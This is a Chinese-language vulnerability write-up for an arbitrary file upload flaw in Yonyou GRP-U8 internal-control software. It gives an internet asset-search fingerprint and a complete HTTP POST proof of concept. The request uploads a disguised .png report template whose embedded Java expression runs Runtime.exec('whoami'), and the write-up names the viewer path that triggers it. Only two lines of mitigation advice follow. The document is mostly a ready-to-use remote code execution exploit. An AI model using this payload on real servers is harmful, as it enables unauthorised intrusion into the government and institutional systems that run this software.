用友GRP-U8 UploadFile 文件上传漏洞

漏洞描述

用友GRP-U8行政事业内控管理软件是一款专门针对行政事业单位开发的内部控制管理系统,旨在提高内部控制的效率和准确性。该软件/UploadFile接口存在文件上传漏洞,跟上篇文章类似,同样可以通过任意文件上传恶意后门文件,从而获取服务器权限。

资产测绘

app=“用友-GRP-U8”

漏洞复现

POC:

POST /UploadFile HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryicNNJvjQHmXpnjFc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 3491

------WebKitFormBoundaryicNNJvjQHmXpnjFc
Content-Disposition: form-data; name="input_localfile"; filename="demodemo.png"
Content-Type: application/octet-stream





panel


header
753
80


-65536
41
15
362
62


100


footer
802
753
280
103


body
80
753
722


学生表
115
77


家庭成员

united-level:1;

3
0
2



关系
-4144897


3
1



性别
-4144897


3
2



年龄
-4144897


3
3



得分


2
0



性别


1
0



姓名


0
0



=$学生表


0
1
3



=$学生表.value()


1
1
3



=$学生表.getName()


2
1
3




4
0
4






4
3






4
2



;


4
1



成员


60,60,60,60
20,20,20,20,20


102








成员
$.value()


学生表
new Object[]{new BufferedReader(new InputStreamReader(java.lang.Runtime.getRuntime().exec("whoami").getInputStream())).readLine()}




------WebKitFormBoundaryicNNJvjQHmXpnjFc
Content-Disposition: form-data; name="type"

1
------WebKitFormBoundaryicNNJvjQHmXpnjFc--

用友GRP-U8 UploadFile 文件上传漏洞_第1张图片

访问路径:/u8qx/tools/defaultviewer.jsp?file=…/…/upload/demodemo.png
用友GRP-U8 UploadFile 文件上传漏洞_第2张图片

修复建议

通过防火墙等安全设备限制访问策略,设置内容检测机制和白名单访问
如非必要,禁止公网访问该系统

你可能感兴趣的:(漏洞复现,web安全,安全)